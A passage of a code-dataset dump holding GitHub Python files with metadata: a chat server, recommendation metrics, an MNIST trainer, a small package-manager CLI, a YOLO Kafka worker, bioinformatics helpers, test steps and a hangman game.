arr[ i ] ):\n arr[ par ], arr[ i ] = arr[ i ], arr[ par ]\n self.sift_up( arr, n, par )\n \n \n def findKthLargest(self, nums, k):\n heap = []\n start = 0\n n = 0\n for i in range( len( nums ) ):\n if len( heap ) < k:\n heap.insert( -1, -nums[ i ] )\n self.sift_up( heap, len( heap ), len( heap ) - 1 )\n else:\n if -nums[ i ] <= heap[ 0 ]:\n heap.insert( -1, -nums[ i ] )\n self.sift_up( heap, len( heap ), len( heap ) - 1 )\n a = heap.pop( -1 )\n heap[ 0 ] = a\n self.sift_down( heap, len( heap ), 0 )\n print( heap )\n \n return heap[ 0 ] * -1\n\na = Solution()\n\nprint( a.findKthLargest( [ 3,2,1,5,6,4 ], 2 ) )\n","repo_name":"YingjingLu/Cai-Ji","sub_path":"top_k.py","file_name":"top_k.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"72128262614","text":"import socket\nimport threading\n# Connection Data\nhost = '127.0.0.1'\nport = 55554\n\n# Starting Server\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver.bind((host, port))\nserver.listen()\n\n# Lists For Clients and Their Nicknames\nclients = []\nnicknames = []\n\n# Sending Messages To All Connected Clients\n\n\ndef broadcast(message):\n\n for client in clients:\n client.send(message)\n\n# Handling private messages From Clients\n\n\ndef private(nick, user, message):\n text = '{} says: {}'.format(nick, message).encode('ascii')\n index2 = nicknames.index(nick)\n try:\n index = nicknames.index(user)\n for client in clients:\n print(client)\n if client == clients[index]:\n client.send(text)\n except:\n clients[index2].send(\n (\"Something went wrong. There might not be user with that name\").encode('ascii'))\n\n# Cheking the user feed and acting accoringly\n\n\ndef handle(client):\n while True:\n try:\n message = client.recv(1024).decode('ascii')\n text = message.split(\":\")\n if text[1] == \"private\" or text[1] == \"Private\":\n # send a private message\n private(text[0], text[2], text[3])\n else:\n # if not private message send to all\n broadcast(message.encode('ascii'))\n except:\n # Removing And Closing Clients\n print(\"Error has occured\")\n index = clients.index(client)\n print(index)\n clients.remove(client)\n client.close()\n nickname = nicknames[index]\n broadcast('{} left!'.format(nickname).encode('ascii'))\n nicknames.remove(nickname)\n break\n\n\n# Receiving / Listening Function\ndef receive():\n while True:\n # Accept Connection\n client, address = server.accept()\n print(\"Connected with {}\".format(str(address)))\n\n # Request And Store Nickname\n client.send('NICK'.encode('ascii'))\n nickname = client.recv(1024).decode('ascii')\n nicknames.append(nickname)\n clients.append(client)\n\n # Print And Broadcast Nickname\n print(\"Nickname is {}\".format(nickname))\n broadcast(\"{} joined!\".format(nickname).encode('ascii'))\n client.send('Connected to server!'.encode('ascii'))\n\n # Start Handling Thread For Client\n thread = threading.Thread(target=handle, args=(client,))\n thread.start()\n\n\nreceive()\n","repo_name":"EvilMoonBerry/chat","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"73169718933","text":"\"\"\"\nFunctions related to recommendation; mostly (entirely?) scoring metrics\nAuthor: Victor Veitch\n\"\"\"\n\nimport numpy as np\n\n\ndef nDCG(users, ranks, test, p=np.inf):\n \"\"\"\n Computes the normalized Discounted Cumulative Gain at rank p\n\n Note: currently only handles simple graphs\n Note: if this turns out to be slow, can be sped up w smarter data structure and searchsorted in same way as pq-samp gen\n\n :param users: np.array of labels of user to score recommendations\n :param ranks: np.array of [users, recommendations]; ith row corresponds to user[i]\n :param test: edge list of true values to score against\n :param p: int\n :return:\n \"\"\"\n\n # restrict rankings to top p\n rel_ranks = ranks[:, 0:min(p, ranks.shape[1])-1]\n\n nDCG = np.zeros(users.shape[0])\n for en, user in enumerate(users):\n user_test = test[test[:, 0] == user]\n test_ranks = np.isin(rel_ranks[en, :], user_test[:, 1]).nonzero()[0] + 1\n DCG = np.sum(np.log(2.) / (np.log(test_ranks + 1)))\n\n num_rel = min(p, user_test.shape[0]) # number of relevant\n itest_ranks = np.array(range(num_rel)) + 1\n iDCG = np.sum(np.log(2.) / (np.log(itest_ranks + 1)))\n if iDCG == 0:\n nDCG[en] = -13 # this is to avoid divide by 0 runtime erroe\n else:\n nDCG[en] = DCG / iDCG\n # if np.isnan(nDCG[en]):\n # happens if user has not rated any test items\n # (this is possible under pq sampling if all test ratings for the user are for items not included in train)\n # pass\n\n return nDCG[nDCG != -13]\n\n\ndef precision_at_m(users, ranks, test, m):\n precision = np.zeros(users.shape[0])\n for en, user in enumerate(users):\n user_test = test[test[:, 0] == user]\n denominator = np.minimum(m, user_test[:, 1].shape[0])\n numerator = np.sum(np.isin(ranks[en, 0:m], user_test[:, 1])).astype(np.float)\n if denominator == 0:\n precision[en] = -13\n else:\n precision[en] = numerator/ denominator\n\n return precision[precision != -13]\n\n\ndef score_recommendations(rankings, test_users, test, p=1000, m=20, batch_size=500):\n \"\"\"\n\n :param rankings: matrix of shape [test_users, num_rankings] where rankings[i,:] is ordered list of items in test\n :param test_users: test_users[i] is the label of the user represented in the ith row of the ranking matrix\n :param test: graph of test set, in (edge_list, weights) format\n :param p: as in NDCG@p\n :param m: as in precision@m\n :param batch_size: number of users to process per batch\n :return:\n \"\"\"\n\n el, weights = test\n\n # batch up the users (to avoid memory problems... not clear how much this really matters)\n num_users = test_users.shape[0]\n num_splits = np.ceil(num_users / batch_size).astype(int)\n test_user_splits = np.array_split(test_users, num_splits)\n ranking_splits = np.array_split(rankings, num_splits)\n\n agg_ndcg_scores = []\n agg_precision_scores = []\n\n for split_idx in range(num_splits):\n test_users_sp = test_user_splits[split_idx]\n test_ranks_sp = ranking_splits[split_idx]\n\n agg_ndcg_scores += [nDCG(test_users_sp, test_ranks_sp, el, p=p)]\n agg_precision_scores += [precision_at_m(test_users_sp, rankings, el, m=m)]\n\n ndcg_scores = np.concatenate(agg_ndcg_scores)\n precision_scores = np.concatenate(agg_precision_scores)\n\n return ndcg_scores, precision_scores","repo_name":"ekanshs/data-splitting","sub_path":"helpers/recommend.py","file_name":"recommend.py","file_ext":"py","file_size_in_byte":3448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"15206840619","text":"import RPi.GPIO as GPIO\nimport MFRC522\nimport signal\n\ncontinue_reading = True\n\n\n# function to read uid an conver it to a string\n\ndef uidToString(uid):\n mystring = \"\"\n for i in uid:\n mystring = format(i, '02X') + mystring\n return mystring\n\n\n# Capture SIGINT for cleanup when the script is aborted\ndef end_read(signal, frame):\n global continue_reading\n print(\"Ctrl+C captured, ending read.\")\n continue_reading = False\n GPIO.cleanup()\n\n# Hook the SIGINT\nsignal.signal(signal.SIGINT, end_read)\n\n# Create an object of the class MFRC522\nMIFAREReader = MFRC522.MFRC522()\n\n# Welcome message\nprint(\"Welcome to the MFRC522 data read example\")\nprint(\"Press Ctrl-C to stop.\")\n\n# This loop keeps checking for chips.\n# If one is near it will get the UID and authenticate\nwhile continue_reading:\n\n # Scan for cards\n (status, TagType) = MIFAREReader.MFRC522_Request(MIFAREReader.PICC_REQIDL)\n\n # If a card is found\n if status == MIFAREReader.MI_OK:\n print (\"Card detected\")\n\n # Get the UID of the card\n (status, uid) = MIFAREReader.MFRC522_SelectTagSN()\n # If we have the UID, continue\n if status == MIFAREReader.MI_OK:\n print(\"Card read UID: %s\" % uidToString(uid))\n else:\n print(\"Authentication error\")\n\n","repo_name":"ianp1/ldap-config","sub_path":"masterterminal/MFRC522-python/Read.py","file_name":"Read.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"25644444261","text":"# Dependencies for our CNN \nimport tensorflow as tf\nimport numpy as np\n# Load in the MNIST dataset\n(X_train, y_train), (X_test, y_test) = tf.keras.datasets.mnist.load_data()\n\n# Reshape our data into 4 dimensions because the CNN requires it\nX_train = X_train.reshape(X_train.shape[0], 28, 28, 1).astype('float32')\nX_test = X_test.reshape(X_test.shape[0], 28, 28, 1).astype('float32')\n# Normalize our values from [0, 255] to [0, 1]\nX_train = X_train / 255\nX_test = X_test / 255\n# This converts the class vectors to binary matrices. This means that for class 1 which would represent the number '1', it would be represented as [0, 1, 0, 0, 0, 0, 0, 0, 0, 0]\ny_train = tf.keras.utils.to_categorical(y_train)\ny_test = tf.keras.utils.to_categorical(y_test)\nnum_classes = y_test.shape[1]\n\n# Define our model\nmodel = tf.keras.models.Sequential()\n\n#First convolution and maxpooling layer\nmodel.add(tf.keras.layers.Conv2D(32, (3, 3), input_shape=(28, 28, 1), activation='relu'))\nmodel.add(tf.keras.layers.MaxPooling2D(pool_size=(2, 2)))\n\n#Second convolution and maxpooling layer\nmodel.add(tf.keras.layers.Conv2D(64, (3, 3), activation='relu'))\nmodel.add(tf.keras.layers.MaxPooling2D(pool_size=(2, 2)))\n\n# Dropout layer to help convergence :)\nmodel.add(tf.keras.layers.Dropout(0.25))\n# Flatten our multi dimensional matrix to 1-D to be inputted into the DNN\nmodel.add(tf.keras.layers.Flatten())\n# Define the layers and nodes for the DNN\nmodel.add(tf.keras.layers.Dense(512, activation='relu'))\nmodel.add(tf.keras.layers.Dropout(rate=0.5)) \n# Define the output layer\nmodel.add(tf.keras.layers.Dense(10, activation='softmax'))\n\n# Define the loss, optimizer and metrics for the model\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n# Trains our model for 10 epochs\nmodel.fit(X_train, y_train, epochs=10, shuffle=True)\nmodel.save(\"digit_recognition.model\")\n# The model had 99.2% accuracy so I got super lucky with my training\n","repo_name":"GovindN75/Number-Predictor","sub_path":"Number Predictor/Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"39658598987","text":"# desc: a class to parse the command received\n# args: message - the received message\n# retn: a named tuple containing the parsed data\nclass ParseMessage:\n def __init__(self, message):\n # get the arguments in the message\n self.args = message.content.upper().split()\n # get the command after the command prefix\n self.command = self.args.pop(0)[1:]\n\n # initialize the params with default values\n self.game = 'NONE'\n self.name = 'NONE'\n self.wins = 'NONE'\n self.sort = 'NONE'\n self.losses = 'NONE'\n self.winner = 'NONE'\n self.losers = 'NONE'\n self.nonKeyed = 'NONE'\n\n # iterate through each argument\n for arg in self.args:\n # split the argument into its parameters\n try:\n key, value = arg.split('=')\n except ValueError:\n key = 'NONE'\n value = arg\n\n # set the command params\n if key == 'GAME':\n self.game = value\n elif key == 'NAME':\n self.name = value\n elif key == 'WINS':\n self.wins = value\n elif key == 'SORT':\n self.sort = value\n elif key == 'LOSSES':\n self.losses = value\n elif key == 'WINNER':\n self.winner = value\n elif key == 'LOSERS':\n self.losers = value.split(',')\n elif key == 'NONE':\n self.nonKeyed = value\n","repo_name":"qwertyboy/gamebot","sub_path":"cmdparser.py","file_name":"cmdparser.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"7081547812","text":"# Enter your code here. Read input from STDIN. Print output to STDOUT\nn = int(input())\nl = list(map(int, (input().split())))\nl.sort()\nmean = 0\nsum = 0\nmedian = 0\nmax_count = 1\nmode = l[0]\ncur_count = 1\nfor i in l:\n sum += i\nmean = sum / n\n\nif n %2 == 1:\n median = l[n//2]\nelse:\n median = (l[n//2 ] + l[n//2 +1]) / 2\n \nfor i in range(n-1):\n if l[i] == l[i+1]:\n cur_count += 1\n else:\n max_count = 1\n if cur_count > max_count:\n max_count = cur_count\n mode = l[i+1]\n \n \n\nprint(mean)\nprint(median)\nprint(mode)","repo_name":"ngtuetam/dsa-notes","sub_path":"math-statistic/mean_med_mode.py","file_name":"mean_med_mode.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"1940739777","text":"from prettytable import PrettyTable, MSWORD_FRIENDLY\nfrom .printing import err, success\nfrom appdirs import user_data_dir\nfrom getpass import getpass\nfrom shutil import rmtree\nfrom pathlib import Path\nimport requests\nimport tarfile\nimport json\nimport os\nimport re\n\nTOK_PATH = Path(user_data_dir('pckp', 'sertdfyguhi'))\nTOK_PATH.mkdir(exist_ok=True, parents=True)\n\ndef set_token(tok):\n with open((TOK_PATH / 'token.txt'), 'w') as f:\n f.write(tok)\n f.close()\n\ndef get_token():\n if not os.path.exists((TOK_PATH / 'token.txt')):\n err('You are not logged in.')\n with open((TOK_PATH / 'token.txt'), 'r') as f:\n return f.read()\n\ndef install(package, url, message=True):\n req = requests.get(url.format(package))\n\n if req.status_code != 200:\n err(req.json()['message'])\n \n pkg_name = package\n if '-' in package:\n pkg_name = package.split('-')[0]\n\n filename = re.findall('filename=\"(.+)\"', req.headers['content-disposition'])[0].replace('.tar', '')\n path = Path(f'libraries/{pkg_name}')\n\n if os.path.exists(path):\n rmtree(path)\n os.mkdir(path)\n\n try:\n path.mkdir(exist_ok=True)\n except FileNotFoundError:\n err('libraries folder not found in current working directory.')\n\n with open((path / 'package.tar'), 'wb') as f:\n f.write(req.content)\n\n with tarfile.open((path / 'package.tar'), 'r') as tar:\n tar.extractall(f'libraries/{pkg_name}')\n\n os.remove((path / 'package.tar'))\n\n with open((path / 'pckp.json'), 'r') as f:\n c_json = json.loads(f.read())\n\n if 'dependencies' in c_json:\n for dep_pkg in c_json['dependencies']:\n install(f\"{dep_pkg}-{c_json['dependencies'][dep_pkg]}\", url, False)\n\n if message:\n if not os.path.exists('pckp.json'):\n with open('pckp.json', 'w') as f:\n f.write('{}')\n f.close()\n\n with open('pckp.json', 'r+') as f:\n try:\n c_json = json.loads(f.read())\n except json.JSONDecodeError:\n err('Invalid JSON in pckp.json')\n\n f.seek(0)\n\n try:\n c_json['dependencies'] = {\n **c_json['dependencies'],\n **{ pkg_name: filename.split('-')[1] }\n }\n except KeyError:\n c_json['dependencies'] = { pkg_name: filename.split('-')[1] }\n\n f.write(json.dumps(c_json, sort_keys=False, indent=2))\n f.close()\n\n if message:\n success(f\"{filename} installed successfully.\")\n\ndef uninstall(package):\n if os.path.exists(f'libraries/{package}'):\n rmtree(f'libraries/{package}')\n else:\n err(f'{package} is not installed.')\n\n if os.path.exists('pckp.json'):\n with open('pckp.json', 'r+') as f:\n try:\n c_json = json.loads(f.read())\n except json.JSONDecodeError:\n err('Invalid JSON in pckp.json')\n\n f.seek(0)\n\n del c_json['dependencies'][package]\n\n f.write(json.dumps(c_json, sort_keys=False, indent=2))\n f.close()\n else:\n with open('pckp.json', 'w') as f:\n f.write(json.dumps({ \"dependencies\": {} }, sort_keys=False, indent=2))\n f.close()\n\n success(f'{package} successfully uninstalled.')\n\ndef register(url):\n data = {\n \"user\": input('username: '),\n \"pass\": getpass('password: ')\n }\n\n req = requests.post(url, json=data)\n\n if req.status_code != 200:\n err(req.json()['message'])\n\n res = req.json()\n set_token(res['token'])\n success(res['message'])\n\ndef publish(json, url):\n files = { f: open(f, 'r').read() for f in os.listdir() if os.path.isfile(f) }\n json['data'] = files\n json['token'] = get_token()\n\n if 'long_desc' in json and os.path.exists(json['long_desc']):\n json['long_desc'] = open(json['long_desc'], 'r').read()\n\n req = requests.post(url, json=json)\n res = req.json()\n if req.status_code != 200:\n err(res['message'])\n\n success(res['message'])\n\ndef search(package, url):\n req = requests.get(url, { 'q': package })\n res = req.json()\n\n if req.status_code != 200:\n err(res['message'])\n\n table = PrettyTable([ 'Name', 'Version', 'Author' ])\n for rating in res:\n table.add_row(rating.values())\n table.set_style(MSWORD_FRIENDLY)\n print(table)\n","repo_name":"litecave/pckp","sub_path":"cli/helper/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4434,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"71684457173","text":"from utilz.kafka_utils import create_consumer, create_producer\nfrom utilz.misc import custom_serializer, resource_exists, log, create_lock\nfrom PIL import Image\nfrom numpy import asarray\nimport io, torch, socket, os, logging\n\ndef run():\n\n # DYNAMIC ARGUMENTS FOR YOLO PROCESSING\n args = {\n 'model': os.environ.get('YOLO_MODEL', 'custom-750k'),\n 'validate_results': True if os.environ.get('VALIDATE_RESULTS', 'TRUE') == 'TRUE' else False,\n 'kafka_input': 'yolo_input',\n 'kafka_output': 'yolo_output',\n }\n\n # CREATE A PERMANENT LOGFILE\n logging.basicConfig(filename='yolo_logs.log', encoding='utf-8', level=logging.DEBUG)\n\n ########################################################################################\n ########################################################################################\n\n # MAKE SURE THE MODEL FILE EXISTS\n if not resource_exists(f'./models/{args[\"model\"]}.pt'):\n return\n\n # CREATE KAFKA CLIENTS\n kafka_consumer = create_consumer(args['kafka_input'])\n kafka_producer = create_producer()\n\n # MAKE SURE KAFKA CONNECTIONS ARE OK\n if not kafka_producer.connected() or not kafka_consumer.connected():\n return\n\n # LOAD THE INTENDED YOLO MODEL\n yolo_model = torch.hub.load('ultralytics/yolov5', 'custom', path=f'./models/{args[\"model\"]}.pt', trust_repo=True, force_reload=True)\n device = yolo_model.parameters().__next__().device\n log(f'LOADED MODEL ({args[\"model\"]}) ON DEVICE ({device})')\n\n # TRACK WHICH MACHINE (POD) IS DOING THE PROCESSING\n hostname = socket.gethostname()\n ip_addr = socket.gethostbyname(hostname)\n\n # CONSUMER THREAD STUFF\n thread_lock = create_lock()\n\n ########################################################################################\n ########################################################################################\n\n # WHAT THE THREAD DOES WITH POLLED EVENTS\n def process_event(img_bytes, nth_thread):\n\n # CONVERT INPUT BYTES TO IMAGE & GIVE IT THREAD SPECIFIC YOLO MODEL\n img = Image.open(io.BytesIO(img_bytes))\n results = yolo_model.forward(asarray(img))\n\n # PUSH RESULTS INTO VALIDATION TOPIC\n if args['validate_results']:\n kafka_producer.push_msg(args['kafka_output'], custom_serializer({\n 'timestamps': {\n 'pre': results.t[0],\n 'inf': results.t[1],\n 'post': results.t[2],\n },\n 'source': ip_addr,\n 'model': args['model'],\n 'dimensions': results.s\n }))\n\n ########################################################################################\n ########################################################################################\n\n # CREATE & START WORKER THREADS\n try:\n kafka_consumer.poll_next(1, thread_lock, process_event)\n\n # TERMINATE MAIN PROCESS AND KILL HELPER THREADS\n except KeyboardInterrupt:\n thread_lock.kill()\n log('WORKER MANUALLY KILLED..', True)\n\nrun()","repo_name":"wickstjo/aalto-ensure","sub_path":"yolo/app/processor.py","file_name":"processor.py","file_ext":"py","file_size_in_byte":3093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"4684297681","text":"import os\r\nimport sys\r\nimport subprocess\r\n\r\n\r\ndef get_chr_file_dict(chr_directory, target_chromo_list):\r\n listdir = os.listdir(chr_directory)\r\n listdir = [f for f in listdir if '.fa' in f and not f.endswith('.fai')]\r\n chromo_file_dict = {}\r\n for chr_file in listdir:\r\n chr_file = os.path.join(chr_directory, chr_file)\r\n if chr_file.endswith('.gz'):\r\n gunzip_cmp = ('gunzip', chr_file)\r\n res0 = subprocess.Popen(gunzip_cmp)\r\n res0.wait()\r\n chr_file = chr_file.rsplit('.', 1)[0]\r\n if res0.returncode != 0:\r\n exit(1)\r\n\r\n with open(chr_file) as f:\r\n for line in f:\r\n if line.startswith('>'):\r\n chromo = line.strip().split()[0][1:]\r\n if chromo in target_chromo_list:\r\n chromo_file_dict[chromo] = chr_file\r\n return chromo_file_dict\r\n\r\n\r\ndef make_windows(df, temp_dir, step, output_file):\r\n # bedtools makewindows will lose information on strand\r\n # split df by strand\r\n # gtf is 1 based, bed is 0-based\r\n df['end'] += 1\r\n for strand in ['+', '-']:\r\n tmp_file = temp_dir + '.target.strand%s.bed' % strand\r\n df[df['strand'] == strand][['seqname', 'start', 'end']].sort_values(['seqname', 'start', 'end']).to_csv(\r\n tmp_file, sep='\\t', header=False, index=False)\r\n bedtools_merge = ('bedtools', 'merge', '-i', tmp_file)\r\n bedtools_cmd = ('bedtools', 'makewindows', '-b', '-', '-w', '13', '-s', str(step))\r\n awk_cmd = (\"awk\", \"{print $0\" + '\"\\t\"$1\"_' + strand + '_\"$2 \"\\t0\\t' + strand + '\"}')\r\n res0 = subprocess.Popen(bedtools_merge, stdout=subprocess.PIPE)\r\n res1 = subprocess.Popen(bedtools_cmd, stdin=res0.stdout, stdout=subprocess.PIPE)\r\n res2 = subprocess.Popen(awk_cmd, stdin=res1.stdout, stdout=open(output_file, 'a'))\r\n res2.wait()\r\n res1.wait()\r\n\r\n if res1.returncode == 0 and res2.returncode == 0:\r\n # clean up temp files\r\n os.remove(tmp_file)\r\n else:\r\n sys.exit(1)\r\n\r\n\r\ndef get_window_seq(chromo_dict, input_file, output_file):\r\n with open(input_file) as f:\r\n nb_cols = len(f.readline().split())\r\n if nb_cols == 0:\r\n os.rename(input_file, output_file)\r\n else:\r\n chromo_file = input_file + '.chromo'\r\n # gtf is 1-based and bed 0-based\r\n split_chromo = (\"awk\", ' $3 - $2 >= 13 {print $1 \"\\t\" $2 - 1 \"\\t\" $3 - 1 \"\\t\"$'\r\n + '\"\\t\"$'.join(str(i) for i in range (4, nb_cols + 1))\r\n + ' > ' + '\"' + chromo_file + '\"' + \"$1\" + \"}\", input_file)\r\n res0 = subprocess.Popen(split_chromo)\r\n res0.wait()\r\n if res0.returncode == 0:\r\n chromo_list = [f.replace(os.path.basename(input_file) + '.chromo', '') for f in os.listdir(os.path.dirname(chromo_file))\r\n if os.path.basename(input_file) + '.chromo' in f]\r\n os.remove(input_file)\r\n for chromo in chromo_list:\r\n chr_fasta = chromo_dict[chromo]\r\n getfasta_cmd = ('bedtools', 'getfasta', '-fi', chr_fasta, '-bed', chromo_file + chromo, '-bedOut', '-s')\r\n awk_cmd = ('awk', '{print $1 \"\\t\" $2 + 1 \"\\t\" $3 + 1 \"\\t\"$'\r\n + '\"\\t\"$'.join(str(i) for i in range (4, nb_cols + 2)) # +2 because we added sequence column\r\n + '}' )\r\n res1 = subprocess.Popen(getfasta_cmd, stdout=subprocess.PIPE)\r\n res2 = subprocess.Popen(awk_cmd, stdin=res1.stdout, stdout=open(output_file, 'a'))\r\n res2.wait()\r\n res1.wait()\r\n if res1.returncode == 0 and res2.returncode == 0:\r\n # clean up temp files\r\n os.remove(chromo_file + chromo)\r\n else:\r\n sys.exit(1)\r\n else:\r\n sys.exit(1)\r\n\r\n\r\n\r\ndef get_seq_bedtools(dataf, chr_directory, verbose, temp_dir, step):\r\n if verbose:\r\n print('Extracting target sequence')\r\n\r\n dataf['seqname'] = dataf['seqname'].map(str)\r\n target_chr_list = set(dataf['seqname'].unique())\r\n\r\n # list the chromosomes contained in each file\r\n chromo_file_dict = get_chr_file_dict(chr_directory, target_chr_list)\r\n\r\n missing_chromo = target_chr_list - set(chromo_file_dict.keys())\r\n if len(missing_chromo) > 0:\r\n print('Missing chromosome(s) in fasta files:\\n%s\\nExiting.' %(', '.join(missing_chromo)), file=sys.stderr)\r\n sys.exit(1)\r\n\r\n window_file = temp_dir + '.targetwindows.bed'\r\n window_seq_file = temp_dir + '.targetwindows.seq.bed'\r\n make_windows(dataf, temp_dir, step, window_file)\r\n get_window_seq(chromo_file_dict, window_file, window_seq_file)\r\n return chromo_file_dict\r\n","repo_name":"scottgroup/snoGloBe","sub_path":"bin/fetch_sequence.py","file_name":"fetch_sequence.py","file_ext":"py","file_size_in_byte":4824,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"41324892660","text":"from behave import given, when, then\nfrom selenium.webdriver.common.by import By\nfrom time import sleep\n\n\n\n\nSEARCH_RESULT = (By.XPATH,'//span[@class =\"a-color-state a-text-bold\"]')\n# PRODUCT_PRICE = (By.XPATH, \"//div[@data-component-type='s-search-result']//a[.//span[@class='a-price']]\")\n\nPRODUCT_NAME = (By.CSS_SELECTOR, 'h2 span.a-text-normal')\nSEARCH_RESULTS = (By.CSS_SELECTOR, '[data-component-type=\"s-search-result\"]')\nPRODUCT_IMG = (By.CSS_SELECTOR, '.s-image[data-image-latency=\"s-product-image\"]')\n\n\n\n# @when('Click on the first product')\n# def click_first_product(context):\n# context.driver.find_element(*PRODUCT_PRICE).click()\n# sleep(2)\n\n\n@when('Select department by alias {dept}')\ndef select_dept(context, dept):\n context.app.header.select_dept(dept)\n\n\n@then('Verify search result is {expected_result}')\ndef verify_search_result(context, expected_result):\n actual_result = context.driver.find_element(*SEARCH_RESULT).text\n assert expected_result == actual_result, f'Error, expected {expected_result} did not match actual {actual_result}'\n # context.app.search_result_page.verify_search_result(expected_result)\n\n\n@then('Verify every product has a product name and an image')\ndef verify_products_name_img(context):\n all_products = context.driver.find_elements(*SEARCH_RESULTS)\n\n for product in all_products:\n product_name = product.find_element(*PRODUCT_NAME).text\n print(product_name)\n assert product_name, 'Product name not shown'\n product.find_element(*PRODUCT_IMG)\n\n@then('Verify {dept} department is selected')\ndef verify_dept_selected(context, dept):\n context.app.header.verity_dept_selected(dept)","repo_name":"Gheetha76/Internship_project","sub_path":"features/steps/test_pdt__img_name.py","file_name":"test_pdt__img_name.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"33404303401","text":"import math\nimport random\nimport statistics as stats\n\ndef c(l):\n return random.choice(l)\n\ndef r(k,k2 = None):\n if k2 == None:\n return c(range(k))\n else:\n return c(range(k,k2))\n\ndef rn(p):\n return sum([r(10)*(10**i) for i in range(p)])\n\n# initialize price as a random 4-digit number\np_0 = rn(4)\n# tick size is 0.005, 0.5, 5, or 50\nts = int(10**math.floor(math.log(p_0,10))/20.0)\n\nn_prices = 25\npossible_prices = [p_0 + ts*i for i in range(n_prices)]\nextended_possible_prices = [p_0 + ts*i/2.0 for i in range(n_prices*2)]\n\norders = []\nwhile len(orders) < 20:\n b,a = c(possible_prices),c(possible_prices)\n if b > a:\n _ = b\n b = a\n a = _\n if b != a:\n orders.append({\"bs\":r(1,11),\"b\":b,\"a\":a,\"as\":r(1,11)})\n\nprice_summaries = {p:{\"bs\":0,\"as\":0} for p in extended_possible_prices}\nfor o in orders:\n price_summaries[o[\"b\"]][\"bs\"] += o[\"bs\"]\n price_summaries[o[\"a\"]][\"as\"] += o[\"as\"]\n\n# print out the bid and ask sizes at prices that have them\nfor p in possible_prices:\n if price_summaries[p][\"bs\"] != 0 or price_summaries[p][\"as\"] != 0:\n print(price_summaries[p][\"bs\"],p,price_summaries[p][\"as\"])\nprint()\n\n# print out the total buyers and sellers for every price, along with the surplus (<- buyers - sellers)\nfor p_i in range(len(extended_possible_prices)):\n p = extended_possible_prices[p_i]\n b_t = sum([price_summaries[p_][\"bs\"] for p_ in extended_possible_prices[p_i:]]) # buyers at prices above or equal to p\n a_t = sum([price_summaries[p_][\"as\"] for p_ in extended_possible_prices[:p_i+1]]) # sellers at prices below or equal to p\n s = b_t - a_t\n price_summaries[p][\"b_t\"] = b_t\n price_summaries[p][\"a_t\"] = a_t\n price_summaries[p][\"s\"] = s\n print(p,b_t,a_t,s)\nprint()\n\nbest_surplus = float(\"inf\")\nbest_prices = []\nfor p in extended_possible_prices:\n s_ = price_summaries[p][\"s\"]\n if abs(s_) < abs(best_surplus):\n best_prices = [p]\n best_surplus = s_\n elif abs(s_) == abs(best_surplus):\n best_prices.append(p)\n\nprint(best_prices)\n\nif best_surplus == 0:\n market_price = stats.mean(best_prices)\nelif best_surplus > 0: # buying pressure\n market_price = max(best_prices)\nelse: # selling pressure\n market_price = min(best_prices)\n\nprint(market_price)\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Kuhron/programming","sub_path":"Auction.py","file_name":"Auction.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"11731799166","text":"import os\nimport random\n\nFILE_TO_READ = './archivos/data.txt'\nMAX_MISTAKES = 10\nWINNING_IMAGE_INDEX = 11\n\nALPHABET = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H',\n 'I', 'J', 'K', 'L', 'M', 'N', 'Ñ', 'O',\n 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W',\n 'X', 'Y', 'Z']\n\n\ndef clearScreen():\n os.system(\"cls\" if os.name == \"nt\" else \"clear\")\n\n\ndef print_logo():\n print('''\n\n ╔═══════════════════════════════════════════════════════════╗\n ║ ║\n ║ █ █ █████ █ █ █████ █ █ █████ █ █ ║\n ║ █ █ █ █ ██ █ █ ██ ██ █ █ ██ █ ║\n ║ █████ █████ █ █ █ █████ █ █ █ █████ █ █ █ ║\n ║ █ █ █ █ █ ██ █ █ █ █ █ █ █ ██ ║\n ║ █ █ █ █ █ █ █████ █ █ █ █ █ █ ║\n ║ ║\n ╚═══════════════════════════════════════════════════════════╝\n''')\n\n\ndef get_images():\n die0 = '''\n\n\n\n\n\n\n\n\n\n\n\n\n\n'''\n die1 = '''\n\n\n\n\n\n\n\n _____________\n / /|\n /____________ / |\n | | /\n |_____________|/\n\n'''\n die2 = '''\n ╔\n ║\n ║\n ║\n ║\n ║\n ║\n __║__________\n / ║ /|\n /____________ / |\n | | /\n |_____________|/\n\n'''\n die3 = '''\n ╔═════╦ \n ║\n ║\n ║\n ║\n ║\n ║\n __║__________\n / ║ /|\n /____________ / |\n | | /\n |_____________|/\n\n'''\n die4 = '''\n ╔═════╦ \n ║\n ║\n ║\n ║\n ║\n ║ d b\n __║__________\n / ║ /|\n /____________ / |\n | | /\n |_____________|/\n\n'''\n die5 = '''\n ╔═════╦ \n ║\n ║\n ║\n ║\n ║ / ''' + chr(92) + 